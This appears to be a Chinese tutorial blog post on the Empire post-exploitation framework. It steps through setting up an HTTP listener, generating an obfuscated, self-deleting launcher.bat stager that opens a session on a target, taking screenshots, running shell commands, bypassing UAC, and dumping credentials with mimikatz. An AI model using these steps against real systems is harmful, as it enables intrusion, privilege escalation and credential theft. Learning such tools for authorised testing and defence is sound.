天天看点

内网渗透 day14-empire基础命令的使用

1. 建立监听器

2. 设置stagers

3. 用户交互

4. 提权

empire的基础操作

1. 建立监听器

help    查看帮助命令

内网渗透 day14-empire基础命令的使用

listeners     查看监听器

内网渗透 day14-empire基础命令的使用

uselistener  xxx     使用监听器模块

常用的监听模块:http

按两次tab键查看能使用的监听器模块

内网渗透 day14-empire基础命令的使用
内网渗透 day14-empire基础命令的使用

info    查看参数信息

内网渗透 day14-empire基础命令的使用

设置参数

set Name xxx

内网渗透 day14-empire基础命令的使用

set Host http://xxx

内网渗透 day14-empire基础命令的使用

set Port xxx

内网渗透 day14-empire基础命令的使用
内网渗透 day14-empire基础命令的使用

执行:execute

内网渗透 day14-empire基础命令的使用

main 返回主菜单

这边显示目前有一个活跃的监听器

内网渗透 day14-empire基础命令的使用

2. 设置stagers

usestagers xxx   使用stager模块

常用的模块:windows/hta、windows/launcher_bat

按两次tab键查看能使用的stager模块

内网渗透 day14-empire基础命令的使用
内网渗透 day14-empire基础命令的使用

info  查看要设置的参数

内网渗透 day14-empire基础命令的使用

set Listener xx     设置监听器

内网渗透 day14-empire基础命令的使用

set OutFile /var/www/html/launcher.bat 设置文件生成路劲

内网渗透 day14-empire基础命令的使用

delete   木马运行完是否自动删除

Obfuscate(混淆)

内网渗透 day14-empire基础命令的使用

execute 执行

内网渗透 day14-empire基础命令的使用

在靶机上双击bat文件成功反弹会话

内网渗透 day14-empire基础命令的使用

3. 用户交互

agents 切换到用户列表

内网渗透 day14-empire基础命令的使用

list 列出用户

内网渗透 day14-empire基础命令的使用

rename 修改用户ID的名字

内网渗透 day14-empire基础命令的使用

interact 进入到用户交互界面

内网渗透 day14-empire基础命令的使用

sysinfo     查看系统信息

内网渗透 day14-empire基础命令的使用

sc  截屏

内网渗透 day14-empire基础命令的使用
内网渗透 day14-empire基础命令的使用

searchmodule 搜索模块

内网渗透 day14-empire基础命令的使用

shell + command 执行命令

内网渗透 day14-empire基础命令的使用

spawn 迁移到新的用户需要指定监听器的名字

内网渗透 day14-empire基础命令的使用
内网渗透 day14-empire基础命令的使用

产生了一个新的会话

内网渗透 day14-empire基础命令的使用

用户清除:

kill agents | all

内网渗透 day14-empire基础命令的使用

监听器清除:

kill listener | all

内网渗透 day14-empire基础命令的使用

绕过uac

bypassuac  <listener>      bypassuac绕过uac提权

内网渗透 day14-empire基础命令的使用

可以看到产生了一个带*的会话,提权成功用户名前面会多一个*号

内网渗透 day14-empire基础命令的使用

mimikatz      在拥有权限后可以利用mimikatz获取用户账号密码

内网渗透 day14-empire基础命令的使用

creds         以列表的形式显示mimikatz获取的账号密码

内网渗透 day14-empire基础命令的使用

uac提权(需要手动确认)

searchmodule ask 搜索ask模块

内网渗透 day14-empire基础命令的使用

usemodule privesc/ask       使用privesc/ask模块

内网渗透 day14-empire基础命令的使用

info    查看所需参数

内网渗透 day14-empire基础命令的使用

设置监听器

内网渗透 day14-empire基础命令的使用

run   执行

内网渗透 day14-empire基础命令的使用

靶机弹出uac认证框

内网渗透 day14-empire基础命令的使用

列表中产生新的管理员会话

内网渗透 day14-empire基础命令的使用